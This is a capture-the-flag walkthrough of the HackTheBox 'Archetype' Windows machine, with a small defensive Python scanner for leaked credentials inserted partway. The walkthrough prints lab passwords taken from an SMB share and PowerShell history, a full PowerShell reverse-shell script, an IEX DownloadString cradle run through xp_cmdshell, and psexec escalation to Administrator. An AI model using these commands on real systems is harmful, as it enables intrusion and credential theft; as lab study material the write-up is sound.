Archetype

Difficulty : Very Easy
Operating System : Windows
Rating : 4.0
Author : egre55
Description
This machine is the first in the "Starting Point" set and is rated very easy. We will find a Samba share readable without a password that gives us the information needed to connect to a SQL Server, obtain a reverse shell and escalate to the Administrator user.
Enumeration
For the basic enumeration we will use a tool I developed specifically for working with machines on the HackTheBox platform. It creates the working directory, runs a basic nmap scan and, if it finds a web service, launches a basic enumeration against it.
Download: HTBenum
Nmap
Nmap scan report for archetype.htb (10.10.10.27)
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-31T00:13:54
|_Not valid after: 2051-07-31T00:13:54
|_ssl-date: 2021-07-31T09:49:37+00:00; +18m52s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h42m51s, deviation: 3h07m50s, median: 18m51s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-31T02:49:37-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-31 11:49:41
|_ start_date: N/A
User Own
During enumeration we saw that ports 139 and 445 are open.
Let's check whether we can access the machine's shares.
[root@htb archetype]# smbclient -N -L \\10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
[root@htb archetype]# smbclient -N //10.10.10.27/backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 13:20:57 2020
.. D 0 Mon Jan 20 13:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 13:23:02 2020
10328063 blocks of size 4096. 8257883 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2,4 KiloBytes/sec) (average 2,4 KiloBytes/sec)
[root@htb archetype]# cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Credentials found: ARCHETYPE\sql_svc / M3g4c0rp123
To connect to MSSQL Server we will use a tool from the Impacket suite called mssqlclient.py
[root@htb archetype]# mssqlclient.py -windows-auth ARCHETYPE/sql_svc@10.10.10.27
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Once connected, the first thing to do is check whether we have the sysadmin role, using the IS_SRVROLEMEMBER function
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
1
SQL>
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
SQL>
Contents of shell.ps1:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.21",7788);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
We open one terminal to serve shell.ps1 over HTTP and another with netcat listening for the reverse shell
# tty01
[root@htb archetype]# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# tty02
[root@htb archetype]# nc -lnvvp 7788
listening on [any] 7788 ...
Next we download and run shell.ps1 from inside SQL Server via xp_cmdshell
# SQL SERVER
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.21:8000/shell.ps1") | powershell -noprofile'
# tty02
[root@htb archetype]# nc -lnvvp 7788
listening on [any] 7788 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.27] 49682
whoami
archetype\sql_svc
# net user
User accounts for \\ARCHETYPE
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
sql_svc WDAGUtilityAccount
The command completed successfully.
Now that we have a reverse shell and can move around the system comfortably, we can grab the flag and continue escalating privileges to the Administrator user.
$ dir c:\users\sql_svc\Desktop
Directory: C:\users\sql_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 6:37 AM 32 user.txt
Root Own
One of the things to check during basic enumeration, on Windows as well as on Linux, is the history of executed commands. Most of the time it is disabled, but in this case we will find interesting information.
$ type c:\users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
Credentials found: administrator / MEGACORP_4dm1n!!
As we can see, the backups share was mapped with the administrator user, and we have the password in clear text.
With this information we can use the psexec.py utility from the Impacket suite, which, through a share with write permissions, can give us an interactive shell
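As an added example (not part of the original write-up): a small Python scanner for the two clear-text credential leaks this box relies on, an SSIS .dtsConfig connection string carrying Password= and a net use ... /user: line in the PSReadline history, reporting each hit with the secret redacted. The sample inputs are constructed from the values shown above; the function and variable names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the two artefacts shown in the write-up:
# the SSIS config from the backups share and the PSReadline history file.
DTSCONFIG_XML = r"""<DTSConfiguration>
 <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
  <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;</ConfiguredValue>
 </Configuration>
</DTSConfiguration>"""
PS_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
"""
# 'net use <drive> <share> /user:<name> <password>': the secret is the token
# after the user name; '*' means "prompt for it" and is not a secret.
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(\S+)\s+(\S+)", re.IGNORECASE)

def redact(secret):
    """Keep only the first character so a finding can be shared safely."""
    return secret[:1] + "*" * (len(secret) - 1)

def scan_dtsconfig(xml_text):
    """Flag SSIS connection strings that carry a password in clear text."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        pairs = {}  # ';'-separated key=value pairs, keys are case-insensitive
        for part in (conf.findtext("ConfiguredValue") or "").split(";"):
            if "=" in part:
                key, val = part.split("=", 1)
                pairs[key.strip().lower()] = val.strip()
        pwd = pairs.get("password") or pairs.get("pwd")
        if pwd:
            findings.append({"path": conf.get("Path", ""),
                             "user": pairs.get("user id") or pairs.get("uid", ""),
                             "password": redact(pwd)})
    return findings

def scan_ps_history(text):
    """Flag 'net use ... /user:NAME PASSWORD' lines in ConsoleHost_history.txt."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = NET_USE_RE.search(line)
        if m and m.group(2) != "*" and not m.group(2).startswith("/"):
            findings.append({"line": lineno, "user": m.group(1),
                             "password": redact(m.group(2))})
    return findings

if __name__ == "__main__":
    for hit in scan_dtsconfig(DTSCONFIG_XML) + scan_ps_history(PS_HISTORY):
        print("clear-text credential:", hit)
```

Pointed at a share or a user profile, the same two functions give a defender the same find the attacker made here, without the secret ever landing in a report.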
[root@htb ~]# psexec.py administrator@10.10.10.27
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file iRRWXdVS.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service dtyM on 10.10.10.27.....
[*] Starting service dtyM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>dir c:\users\administrator\Desktop
 Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of c:\users\administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,832,931,328 bytes free
C:\Windows\system32>